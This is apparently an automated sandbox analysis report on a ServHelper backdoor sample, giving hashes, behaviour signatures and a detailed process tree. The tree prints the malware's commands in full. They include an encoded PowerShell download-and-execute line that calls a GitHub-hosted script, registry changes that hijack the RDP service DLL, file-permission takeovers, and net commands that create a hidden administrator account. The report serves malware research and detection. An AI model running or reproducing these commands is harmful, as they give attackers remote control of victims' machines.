Analysis
-
max time kernel
146s -
max time network
104s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
11-06-2021 14:56
Static task
static1
Behavioral task
behavioral1
Sample
7a383f57f7d2190d9af3e57d67cfb004.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
7a383f57f7d2190d9af3e57d67cfb004.exe
Resource
win10v20210408
General
-
Target
7a383f57f7d2190d9af3e57d67cfb004.exe
-
Size
6.9MB
-
MD5
7a383f57f7d2190d9af3e57d67cfb004
-
SHA1
2e783c279542ea1708854413a0cd725184f8fa78
-
SHA256
f18e085889d9d7324c57ecb800563ba2e808c0ef8ad52b7b1f1f3afa169bf836
-
SHA512
0f2509170c215efd58a09b4a00d593f087773da93f1877aab9b9f24474b06ad62494fa730fc435829a0365d7bd3d7440818a99e1b4c866882a0ed1cdc3eec9cb
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 11 1360 powershell.exe -
Executes dropped EXE 3 IoCs
pid Process 1704 Vostra.exe.com 1220 Vostra.exe.com 1764 Vostra.exe.com -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
pid Process 1660 icacls.exe 828 icacls.exe 1728 icacls.exe 1812 icacls.exe 1916 icacls.exe 1596 takeown.exe 1676 icacls.exe 1700 icacls.exe -
Sets DLL path for service in the registry 2 TTPs
-
resource yara_rule behavioral1/files/0x00040000000130ea-203.dat upx behavioral1/files/0x00050000000130eb-204.dat upx -
Deletes itself 1 IoCs
pid Process 1508 powershell.exe -
Loads dropped DLL 5 IoCs
pid Process 1736 cmd.exe 1704 Vostra.exe.com 1220 Vostra.exe.com 1768 Process not Found 1768 Process not Found -
Modifies file permissions 1 TTPs 8 IoCs
pid Process 1700 icacls.exe 1660 icacls.exe 828 icacls.exe 1728 icacls.exe 1812 icacls.exe 1916 icacls.exe 1596 takeown.exe 1676 icacls.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1220 set thread context of 1764 1220 Vostra.exe.com 36 -
Drops file in Windows directory 21 IoCs
description ioc Process File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_625c9dd4-60ac-4598-980f-1e4f22bb4f36 powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_739b533d-c9a7-4c5c-90d0-d37ca25e9a24 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_27788a7e-a051-4489-abf0-08bbf436eeac powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_70f6e14a-838c-4011-8c18-6dca5b41af74 powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b9e343f0-1231-4701-8996-2b248fba56a5 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_70c669dd-d9b5-47eb-94c2-fb54f9c3d57c powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1dc44e94-9820-4f62-ba03-a4dc86b31e84 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9b60f9b2-73ac-401a-be65-1834fdde3fc6 powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7T4PUW7V8KKE0F12P1S5.temp powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_58b4ffb8-48b6-46b3-b91a-753e7108a731 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f50b6714-9132-4aea-81ce-b6272406dffe powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4bb5c35f-1c0d-42fa-b0fc-9f3d92535c04 powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies data under HKEY_USERS 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 80520d9fd15ed701 powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 2020 reg.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1772 PING.EXE -
Suspicious behavior: EnumeratesProcesses 13 IoCs
pid Process 1508 powershell.exe 1508 powershell.exe 532 powershell.exe 532 powershell.exe 1984 powershell.exe 1984 powershell.exe 1096 powershell.exe 1096 powershell.exe 1508 powershell.exe 1508 powershell.exe 1508 powershell.exe 1360 powershell.exe 1360 powershell.exe -
Suspicious behavior: LoadsDriver 4 IoCs
pid Process 464 Process not Found 1768 Process not Found 1768 Process not Found 1768 Process not Found -
Suspicious use of AdjustPrivilegeToken 18 IoCs
description pid Process Token: SeDebugPrivilege 1508 powershell.exe Token: SeDebugPrivilege 532 powershell.exe Token: SeDebugPrivilege 1984 powershell.exe Token: SeDebugPrivilege 1096 powershell.exe Token: SeRestorePrivilege 1700 icacls.exe Token: SeAssignPrimaryTokenPrivilege 1500 WMIC.exe Token: SeIncreaseQuotaPrivilege 1500 WMIC.exe Token: SeAuditPrivilege 1500 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1500 WMIC.exe Token: SeIncreaseQuotaPrivilege 1500 WMIC.exe Token: SeAuditPrivilege 1500 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1424 WMIC.exe Token: SeIncreaseQuotaPrivilege 1424 WMIC.exe Token: SeAuditPrivilege 1424 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1424 WMIC.exe Token: SeIncreaseQuotaPrivilege 1424 WMIC.exe Token: SeAuditPrivilege 1424 WMIC.exe Token: SeDebugPrivilege 1360 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 484 wrote to memory of 1904 484 7a383f57f7d2190d9af3e57d67cfb004.exe 26 PID 484 wrote to memory of 1904 484 7a383f57f7d2190d9af3e57d67cfb004.exe 26 PID 484 wrote to memory of 1904 484 7a383f57f7d2190d9af3e57d67cfb004.exe 26 PID 484 wrote to memory of 1904 484 7a383f57f7d2190d9af3e57d67cfb004.exe 26 PID 1904 wrote to memory of 1736 1904 cmd.exe 28 PID 1904 wrote to memory of 1736 1904 cmd.exe 28 PID 1904 wrote to memory of 1736 1904 cmd.exe 28 PID 1904 wrote to memory of 1736 1904 cmd.exe 28 PID 1736 wrote to memory of 1800 1736 cmd.exe 29 PID 1736 wrote to memory of 1800 1736 cmd.exe 29 PID 1736 wrote to memory of 1800 1736 cmd.exe 29 PID 1736 wrote to memory of 1800 1736 cmd.exe 29 PID 1736 wrote to memory of 1704 1736 cmd.exe 30 PID 1736 wrote to memory of 1704 1736 cmd.exe 30 PID 1736 wrote to memory of 1704 1736 cmd.exe 30 PID 1736 wrote to memory of 1704 1736 cmd.exe 30 PID 1736 wrote to memory of 1772 1736 cmd.exe 31 PID 1736 wrote to memory of 1772 1736 cmd.exe 31 PID 1736 wrote to memory of 1772 1736 cmd.exe 31 PID 1736 wrote to memory of 1772 1736 cmd.exe 31 PID 1704 wrote to memory of 1220 1704 Vostra.exe.com 32 PID 1704 wrote to memory of 1220 1704 Vostra.exe.com 32 PID 1704 wrote to memory of 1220 1704 Vostra.exe.com 32 PID 1220 wrote to memory of 1764 1220 Vostra.exe.com 36 PID 1220 wrote to memory of 1764 1220 Vostra.exe.com 36 PID 1220 wrote to memory of 1764 1220 Vostra.exe.com 36 PID 1220 wrote to memory of 1764 1220 Vostra.exe.com 36 PID 1220 wrote to memory of 1764 1220 Vostra.exe.com 36 PID 1764 wrote to memory of 1508 1764 Vostra.exe.com 37 PID 1764 wrote to memory of 1508 1764 Vostra.exe.com 37 PID 1764 wrote to memory of 1508 1764 Vostra.exe.com 37 PID 1508 wrote to memory of 1676 1508 powershell.exe 39 PID 1508 wrote to memory of 1676 1508 powershell.exe 39 PID 1508 wrote to memory of 1676 1508 powershell.exe 39 PID 1676 wrote to memory of 1600 1676 csc.exe 40 PID 1676 wrote to memory of 1600 1676 csc.exe 40 PID 1676 wrote to memory of 1600 1676 csc.exe 40 PID 1508 wrote to memory of 532 1508 powershell.exe 41 PID 1508 wrote to memory of 532 1508 powershell.exe 41 PID 1508 wrote to memory of 532 1508 powershell.exe 41 PID 1508 wrote to memory of 1984 1508 powershell.exe 43 PID 1508 wrote to memory of 1984 1508 powershell.exe 43 PID 1508 wrote to memory of 1984 1508 powershell.exe 43 PID 1508 wrote to memory of 1096 1508 powershell.exe 45 PID 1508 wrote to memory of 1096 1508 powershell.exe 45 PID 1508 wrote to memory of 1096 1508 powershell.exe 45 PID 1508 wrote to memory of 1596 1508 powershell.exe 48 PID 1508 wrote to memory of 1596 1508 powershell.exe 48 PID 1508 wrote to memory of 1596 1508 powershell.exe 48 PID 1508 wrote to memory of 1676 1508 powershell.exe 49 PID 1508 wrote to memory of 1676 1508 powershell.exe 49 PID 1508 wrote to memory of 1676 1508 powershell.exe 49 PID 1508 wrote to memory of 1700 1508 powershell.exe 50 PID 1508 wrote to memory of 1700 1508 powershell.exe 50 PID 1508 wrote to memory of 1700 1508 powershell.exe 50 PID 1508 wrote to memory of 1660 1508 powershell.exe 51 PID 1508 wrote to memory of 1660 1508 powershell.exe 51 PID 1508 wrote to memory of 1660 1508 powershell.exe 51 PID 1508 wrote to memory of 828 1508 powershell.exe 52 PID 1508 wrote to memory of 828 1508 powershell.exe 52 PID 1508 wrote to memory of 828 1508 powershell.exe 52 PID 1508 wrote to memory of 1728 1508 powershell.exe 53 PID 1508 wrote to memory of 1728 1508 powershell.exe 53 PID 1508 wrote to memory of 1728 1508 powershell.exe 53
Processes
-
C:\Users\Admin\AppData\Local\Temp\7a383f57f7d2190d9af3e57d67cfb004.exe"C:\Users\Admin\AppData\Local\Temp\7a383f57f7d2190d9af3e57d67cfb004.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:484 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\cmd < Poi.vsd2⤵
- Suspicious use of WriteProcessMemory
PID:1904 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^nZwSZJdQSZwKBWJCtpbfZHNwzsXALugVPsbikcLGmlTQMSJGkUUtRoHQkZmHLQyLLuVpnCdInRQPNWfBIsgQkprGKGWkWrUJtiyFXmiJDkGqaSrgKXZxBgABegmS$" Che.vsd4⤵PID:1800
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Vostra.exe.comVostra.exe.com D4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1704 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Vostra.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Vostra.exe.com D5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1220 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Vostra.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Vostra.exe.com6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1764 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'7⤵
- Deletes itself
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1508 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hnncfw0x\hnncfw0x.cmdline"8⤵
- Suspicious use of WriteProcessMemory
PID:1676 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEDA9.tmp" "c:\Users\Admin\AppData\Local\Temp\hnncfw0x\CSCA435DBAC26B046208D6671EC3A794BEB.TMP"9⤵PID:1600
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:532
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1984
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1096
-
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1596
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1676
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"8⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1700
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1660
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:828
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1728
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1812
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1916
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f8⤵PID:1500
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f8⤵
- Modifies registry key
PID:2020
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f8⤵PID:1232
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add8⤵PID:360
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add9⤵PID:1328
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr8⤵PID:984
-
C:\Windows\system32\cmd.execmd /c net start rdpdr9⤵PID:1856
-
C:\Windows\system32\net.exenet start rdpdr10⤵PID:968
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr11⤵PID:1072
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService8⤵PID:524
-
C:\Windows\system32\cmd.execmd /c net start TermService9⤵PID:1460
-
C:\Windows\system32\net.exenet start TermService10⤵PID:1368
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService11⤵PID:1668
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f8⤵PID:1536
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f8⤵PID:1060
-
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 304⤵
- Runs ping.exe
PID:1772
-
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵PID:1596
-
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵PID:1004
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵PID:964
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc cmhfcwJT /add1⤵PID:1308
-
C:\Windows\system32\net.exenet.exe user wgautilacc cmhfcwJT /add2⤵PID:1360
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc cmhfcwJT /add3⤵PID:1552
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵PID:1692
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵PID:1232
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵PID:1840
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD1⤵PID:1424
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD2⤵PID:1156
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD3⤵PID:984
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵PID:2040
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵PID:1736
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵PID:296
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc cmhfcwJT1⤵PID:828
-
C:\Windows\system32\net.exenet.exe user wgautilacc cmhfcwJT2⤵PID:1688
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc cmhfcwJT3⤵PID:1908
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:592
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1500
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:1996
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1424
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:1700
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:824
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1360
-
-
-
C:\Windows\System32\cmd.execmd.exe /C net user wgautilacc 12341⤵PID:1548
-
C:\Windows\system32\net.exenet user wgautilacc 12342⤵PID:968
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 12343⤵PID:1576
-
-